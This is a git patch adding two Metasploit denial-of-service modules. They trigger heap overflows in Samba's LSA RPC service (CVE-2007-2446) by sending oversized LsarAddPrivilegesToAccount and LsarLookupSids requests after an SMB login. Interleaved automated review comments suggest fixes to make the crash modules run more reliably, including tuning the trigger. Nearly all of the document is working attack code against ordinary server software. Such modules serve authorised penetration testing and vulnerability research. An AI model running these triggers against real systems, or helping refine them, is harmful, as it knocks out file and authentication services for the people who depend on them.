From fc7dcf82dcad9eb0560ba34d1a43bc070268db96 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Mon, 21 May 2007 20:54:00 +0000
Subject: [PATCH] Adding the PoC modules for transnames/addprivs
git-svn-id: file:///home/svn/framework3/trunk@4954 4d416f70-5f16-0410-b530-b9f4589650da
---
.../auxiliary/dos/samba/lsa_addprivs_heap.rb | 91 ++++++++++++++++++
.../dos/samba/lsa_transnames_heap.rb | 93 +++++++++++++++++++
2 files changed, 184 insertions(+)
create mode 100644 modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
create mode 100644 modules/auxiliary/dos/samba/lsa_transnames_heap.rb
diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
new file mode 100644
index 0000000000..45724463df
--- /dev/null
+++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
@@ -0,0 +1,91 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +module Msf + +class Auxiliary::Dos::Samba::LSA_AddPrivs_Heap < Msf::Auxiliary + + include Auxiliary::Dos + include Exploit::Remote::DCERPC + include Exploit::Remote::SMB + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samba lsa_io_privilege_set Heap Overflow', + 'Description' => %q{ + This module triggers a heap overflow in the LSA RPC service + of the Samba daemon. + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '2007-2446'], + ] + )) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), + ], self.class) + + end + + def run + + pipe = datastore['SMBPIPE'].downcase + + print_status("Connecting to the SMB service...") + connect() + smb_login() + + datastore['DCERPC::fake_bind_multi'] = false + + handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + # Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+) + # Mac OS X: PC control via memcpy to stack ptr + # Solaris: PC control via memcpy to stack ptr + + stub = lsa_open_policy(dcerpc) + stub << NDR.long(1) + stub << NDR.long(0xffffffff) + stub << NDR.long(0x100) + stub << "X" * 0x100 + + print_status("Calling the vulnerable function...") + + begin + # LsarAddPrivilegesToAccount + dcerpc.call(0x13, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + print_good('Server did not respond, this is expected') + rescue => e + if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ + print_good('Server 
disconnected, this is expected')
+ else
+ raise e
+ end
+ end
+
+ disconnect
+ end
+
+end
+end
diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb
new file mode 100644
index 0000000000..246078880f
--- /dev/null
+++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb
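Review bot: In `run`, the trailing `disconnect` is only reached on the happy path: the `rescue => e` branch re-raises anything that is not STATUS_PIPE_DISCONNECTED, and an exception out of `dcerpc_bind` or the stub construction also skips it, so the SMB session is left open on every unexpected failure. Moving the teardown into the existing `begin` block — replace the closing `end` plus the standalone `disconnect` with `ensure`, `disconnect`, `end` — keeps it on every exit path (whether the framework's own cleanup also closes the socket is not visible here). The stub words `NDR.long(1)`, `NDR.long(0xffffffff)` and `NDR.long(0x100)` are also undocumented; a short comment naming which LsarAddPrivilegesToAccount field each one stands for, in the spirit of the per-OS notes just above them, would help whoever next tunes this trigger. The bare `raise` is also the idiomatic way to re-raise inside a rescue, instead of `raise e`.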
@@ -0,0 +1,93 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + + +require 'msf/core' + +module Msf + +class Auxiliary::Dos::Samba::LSA_TransNames_Heap < Msf::Auxiliary + + include Auxiliary::Dos + include Exploit::Remote::DCERPC + include Exploit::Remote::SMB + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Samba lsa_io_trans_names Heap Overflow', + 'Description' => %q{ + This module triggers a heap overflow in the LSA RPC service + of the Samba daemon. + }, + 'Author' => [ 'hdm' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => + [ + ['CVE', '2007-2446'], + ] + )) + + register_options( + [ + OptString.new('SMBPIPE', [ true, "The pipe name to use", 'LSARPC']), + ], self.class) + + end + + def run + + pipe = datastore['SMBPIPE'].downcase + + print_status("Connecting to the SMB service...") + connect() + smb_login() + + datastore['DCERPC::fake_bind_multi'] = false + + handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"]) + print_status("Binding to #{handle} ...") + dcerpc_bind(handle) + print_status("Bound to #{handle} ...") + + stub = lsa_open_policy(dcerpc) + stub << NDR.long(0) + stub << NDR.long(0) + stub << NDR.long(1) + stub << NDR.long(0x20004) + stub << NDR.long(0x100) + stub << ("X" * 16) * 0x100 + stub << NDR.long(1) + stub << NDR.long(0) + + print_status("Calling the vulnerable function...") + + begin + # LsarLookupSids + dcerpc.call(0x0f, stub) + rescue Rex::Proto::DCERPC::Exceptions::NoResponse + print_good('Server did not respond, this is expected') + rescue => e + if e.to_s =~ /STATUS_PIPE_DISCONNECTED/ + print_good('Server disconnected, this is expected') + else + raise e + end + end + + dcerpc.call(0x0f, stub) + + 
disconnect + end + +end +end
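Review bot: The unguarded `dcerpc.call(0x0f, stub)` after the `begin`/`rescue` block in `run` looks like a leftover: once the first call has taken the daemon down (the outcome the rescue branches greet with `print_good`), this second call raises the same NoResponse or STATUS_PIPE_DISCONNECTED error with no handler, so the module ends in an unhandled exception instead of reaching `disconnect`. Delete that line, or if a second trigger is intended, move it inside the `begin` so the same rescue clauses cover it. As in the sibling lsa_addprivs_heap module, `disconnect` should also sit in an `ensure` clause on that `begin` block so the session is torn down when an unexpected error is re-raised.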